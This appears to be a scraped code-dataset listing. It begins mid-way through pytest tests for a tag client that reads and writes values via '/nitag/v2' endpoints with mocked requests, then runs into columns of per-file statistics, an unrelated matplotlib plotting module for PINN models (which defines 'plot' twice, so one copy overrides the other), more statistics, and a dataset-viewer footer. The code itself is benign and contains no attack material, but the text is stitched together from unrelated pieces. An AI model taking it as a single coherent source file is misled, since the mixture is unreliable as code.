def test__create_writer_with_buffer_size__sends_when_buffer_full(self):
path = "tag"
value1 = 1
value2 = 2
writer = self._uut.create_writer(buffer_size=2)
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
writer.write(path, tbase.DataType.INT32, value1, timestamp=timestamp)
writer.write(path, tbase.DataType.INT32, value2, timestamp=timestamp)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value1)},
"timestamp": utctime,
},
{
"value": {"type": "INT", "value": str(value2)},
"timestamp": utctime,
},
],
},
],
)
def test__create_writer_with_buffer_time__sends_when_timer_elapsed(self):
path = "tag"
value = 1
writer = self._uut.create_writer(max_buffer_time=timedelta(milliseconds=50))
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None])
)
writer.write(path, tbase.DataType.INT32, value, timestamp=timestamp)
self._client.all_requests.assert_not_called()
for i in range(100):
if self._client.all_requests.call_count > 0:
break
time.sleep(0.01)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value)},
"timestamp": utctime,
}
],
}
],
)
def test__create_writer_with_buffer_size_and_timer__obeys_both_settings(self):
path = "tag"
value1 = 1
value2 = 2
value3 = 3
writer1 = self._uut.create_writer(
buffer_size=2, max_buffer_time=timedelta(minutes=1)
)
writer2 = self._uut.create_writer(
buffer_size=2, max_buffer_time=timedelta(milliseconds=50)
)
timestamp = datetime.now()
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None, None])
)
writer1.write(path, tbase.DataType.INT32, value1, timestamp=timestamp)
writer1.write(path, tbase.DataType.INT32, value2, timestamp=timestamp)
utctime = datetime.utcfromtimestamp(timestamp.timestamp()).isoformat() + "Z"
self._client.all_requests.assert_called_once_with(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value1)},
"timestamp": utctime,
},
{
"value": {"type": "INT", "value": str(value2)},
"timestamp": utctime,
},
],
}
],
)
writer2.write(path, tbase.DataType.INT32, value3, timestamp=timestamp)
assert 1 == self._client.all_requests.call_count # same as before
for i in range(100):
if self._client.all_requests.call_count > 1:
break
time.sleep(0.01)
assert 2 == self._client.all_requests.call_count
assert self._client.all_requests.call_args_list[1] == mock.call(
"POST",
"/nitag/v2/update-current-values",
params=None,
data=[
{
"path": path,
"updates": [
{
"value": {"type": "INT", "value": str(value3)},
"timestamp": utctime,
}
],
}
],
)
def test__bad_arguments__read__raises(self):
with pytest.raises(ValueError):
self._uut.read(None, include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read("", include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read(" ", include_timestamp=True, include_aggregates=True)
with pytest.raises(ValueError):
self._uut.read("*", include_timestamp=True, include_aggregates=True)
def test__read_with_timestamp_and_aggregates__retrieves_all_data_from_server(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
},
"aggregates": {"count": 7},
}
]
)
)
result = self._uut.read(path, include_timestamp=True, include_aggregates=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert 7 == result.count
assert result.max is None
assert result.min is None
assert result.mean is None
def test__read_with_aggregates__allows_missing_timestamp(self):
path = "test"
value = 3.14
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {"value": {"type": "DOUBLE", "value": str(value)}},
"aggregates": {
"min": "-1.3",
"max": "8.9",
"count": 3,
"avg": 4.7,
},
}
]
)
)
result = self._uut.read(path, include_timestamp=False, include_aggregates=True)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.DOUBLE == result.data_type
assert value == result.value
assert result.timestamp is None
assert -1.3 == result.min
assert 8.9 == result.max
assert 3 == result.count
assert 4.7 == result.mean
def test__read_with_timestamp__does_not_query_aggregates(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
}
}
]
)
)
result = self._uut.read(path, include_timestamp=True, include_aggregates=False)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
def test__read_without_timestamp__retrieves_minimal_data_from_server(self):
path = "test"
value = "success"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"current": {"value": {"type": "STRING", "value": value}}}]
)
)
result = self._uut.read(path, include_timestamp=False, include_aggregates=False)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current/value", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert result.timestamp is None
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
def test__no_tag_value__read__returns_None(self):
path = "test"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 4)
)
assert (
self._uut.read(path, include_timestamp=True, include_aggregates=True)
is None
)
assert (
self._uut.read(path, include_timestamp=False, include_aggregates=True)
is None
)
assert (
self._uut.read(path, include_timestamp=True, include_aggregates=False)
is None
)
assert (
self._uut.read(path, include_timestamp=False, include_aggregates=False)
is None
)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
),
mock.call(
"GET",
"/nitag/v2/tags/{path}/values/current/value",
params={"path": path},
),
]
@pytest.mark.asyncio
async def test__bad_arguments__read_async__raises(self):
with pytest.raises(ValueError):
await self._uut.read_async(
None, include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
"", include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
" ", include_timestamp=True, include_aggregates=True
)
with pytest.raises(ValueError):
await self._uut.read_async(
"*", include_timestamp=True, include_aggregates=True
)
@pytest.mark.asyncio
async def test__read_async_with_timestamp_and_aggregates__retrieves_all_data_from_server(
self,
):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
},
"aggregates": {"count": 7},
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=True, include_aggregates=True
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert 7 == result.count
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__read_async_with_aggregates__allows_missing_timestamp(self):
path = "test"
value = 3.14
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {"value": {"type": "DOUBLE", "value": value}},
"aggregates": {
"min": "-1.3",
"max": "8.9",
"count": 3,
"avg": 4.7,
},
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=False, include_aggregates=True
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.DOUBLE == result.data_type
assert value == result.value
assert result.timestamp is None
assert -1.3 == result.min
assert 8.9 == result.max
assert 3 == result.count
assert 4.7 == result.mean
@pytest.mark.asyncio
async def test__read_async_with_timestamp__does_not_query_aggregates(self):
path = "test"
value = "success"
now = datetime.now(timezone.utc)
utctime = datetime.utcfromtimestamp(now.timestamp()).isoformat() + "Z"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[
{
"current": {
"value": {"type": "STRING", "value": value},
"timestamp": utctime,
}
}
]
)
)
result = await self._uut.read_async(
path, include_timestamp=True, include_aggregates=False
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert now == result.timestamp
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__read_async_without_timestamp__retrieves_minimal_data_from_server(
self,
):
path = "test"
value = "success"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request(
[{"current": {"value": {"type": "STRING", "value": value}}}]
)
)
result = await self._uut.read_async(
path, include_timestamp=False, include_aggregates=False
)
self._client.all_requests.assert_called_once_with(
"GET", "/nitag/v2/tags/{path}/values/current/value", params={"path": path}
)
assert result is not None
assert path == result.path
assert tbase.DataType.STRING == result.data_type
assert value == result.value
assert result.timestamp is None
assert result.count is None
assert result.max is None
assert result.min is None
assert result.mean is None
@pytest.mark.asyncio
async def test__no_tag_value__read_async__returns_None(self):
path = "test"
self._client.all_requests.configure_mock(
side_effect=self._get_mock_request([None] * 4)
)
assert (
await self._uut.read_async(
path, include_timestamp=True, include_aggregates=True
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=False, include_aggregates=True
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=True, include_aggregates=False
)
is None
)
assert (
await self._uut.read_async(
path, include_timestamp=False, include_aggregates=False
)
is None
)
assert self._client.all_requests.call_args_list == [
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call("GET", "/nitag/v2/tags/{path}/values", params={"path": path}),
mock.call(
"GET", "/nitag/v2/tags/{path}/values/current", params={"path": path}
),
mock.call(
"GET",
"/nitag/v2/tags/{path}/values/current/value",
params={"path": path},
),
]
| 38.709302
| 104
| 0.53789
| 11,006
| 109,857
| 5.128839
| 0.02753
| 0.028522
| 0.046485
| 0.053199
| 0.975641
| 0.966677
| 0.956438
| 0.949777
| 0.934258
| 0.925152
| 0
| 0.016513
| 0.343474
| 109,857
| 2,837
| 105
| 38.722947
| 0.766139
| 0.001775
| 0
| 0.728235
| 0
| 0
| 0.09298
| 0.02384
| 0
| 0
| 0
| 0
| 0.138431
| 1
| 0.021569
| false
| 0
| 0.003922
| 0.000392
| 0.033333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c70d95660e691f66dc672fbed3f01cfd70d3b821
| 6,445
|
py
|
Python
|
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
pina/plotter.py
|
s274001/PINA
|
beb33f0da20581338c46f0c525775904b35a1130
|
[
"MIT"
] | null | null | null |
""" Module for plotting. """
import matplotlib
#matplotlib.use('Qt5Agg')
import matplotlib.pyplot as plt
import numpy as np
import torch
from pina import LabelTensor
from pina import PINN
from .problem import SpatialProblem, TimeDependentProblem
#from pina.tdproblem1d import TimeDepProblem1D
class Plotter:
def _plot_2D(self, obj, method='contourf'):
"""
"""
if not isinstance(obj, PINN):
raise RuntimeError
res = 256
pts = obj.problem.spatial_domain.discretize(res, 'grid')
grids_container = [
pts[:, 0].reshape(res, res),
pts[:, 1].reshape(res, res),
]
pts = LabelTensor(torch.tensor(pts), obj.problem.input_variables)
predicted_output = obj.model(pts.tensor)
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
def _plot_1D_TimeDep(self, obj, method='contourf'):
"""
"""
if not isinstance(obj, PINN):
raise RuntimeError
res = 256
grids_container = np.meshgrid(
obj.problem.spatial_domain.discretize(res, 'grid'),
obj.problem.temporal_domain.discretize(res, 'grid'),
)
pts = np.hstack([
grids_container[0].reshape(-1, 1),
grids_container[1].reshape(-1, 1),
])
pts = LabelTensor(torch.tensor(pts), obj.problem.input_variables)
predicted_output = obj.model(pts.tensor)
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
def plot(self, obj, method='contourf', filename=None):
"""
"""
res = 256
pts = obj.problem.domain.sample(res, 'grid')
print(pts)
grids_container = [
pts.tensor[:, 0].reshape(res, res),
pts.tensor[:, 1].reshape(res, res),
]
predicted_output = obj.model(pts)
predicted_output = predicted_output['p']
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
# cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
cb = getattr(axes, method)(*grids_container, predicted_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
if filename:
plt.savefig(filename)
else:
plt.show()
def plot(self, obj, method='contourf', filename=None):
"""
"""
res = 256
pts = obj.problem.domain.sample(res, 'grid')
print(pts)
grids_container = [
pts.tensor[:, 0].reshape(res, res),
pts.tensor[:, 1].reshape(res, res),
]
predicted_output = obj.model(pts)
predicted_output = predicted_output['ux']
if hasattr(obj.problem, 'truth_solution'):
truth_output = obj.problem.truth_solution(*pts.tensor.T).float()
fig, axes = plt.subplots(nrows=1, ncols=3, figsize=(16, 6))
cb = getattr(axes[0], method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[0])
cb = getattr(axes[1], method)(*grids_container, truth_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes[1])
cb = getattr(axes[2], method)(*grids_container, (truth_output-predicted_output.tensor.float().flatten()).detach().reshape(res, res))
fig.colorbar(cb, ax=axes[2])
else:
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8, 6))
# cb = getattr(axes, method)(*grids_container, predicted_output.tensor.reshape(res, res).detach())
cb = getattr(axes, method)(*grids_container, predicted_output.reshape(res, res).detach())
fig.colorbar(cb, ax=axes)
if filename:
plt.savefig(filename)
else:
plt.show()
def plot_samples(self, obj):
for location in obj.input_pts:
plt.plot(*obj.input_pts[location].tensor.T.detach(), '.', label=location)
plt.legend()
plt.show()
| 40.28125
| 144
| 0.596897
| 787
| 6,445
| 4.787802
| 0.120712
| 0.089172
| 0.082803
| 0.063694
| 0.85828
| 0.852972
| 0.852972
| 0.831741
| 0.831741
| 0.831741
| 0
| 0.018542
| 0.255237
| 6,445
| 159
| 145
| 40.534591
| 0.766458
| 0.04422
| 0
| 0.745763
| 0
| 0
| 0.018391
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042373
| false
| 0
| 0.059322
| 0
| 0.110169
| 0.016949
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.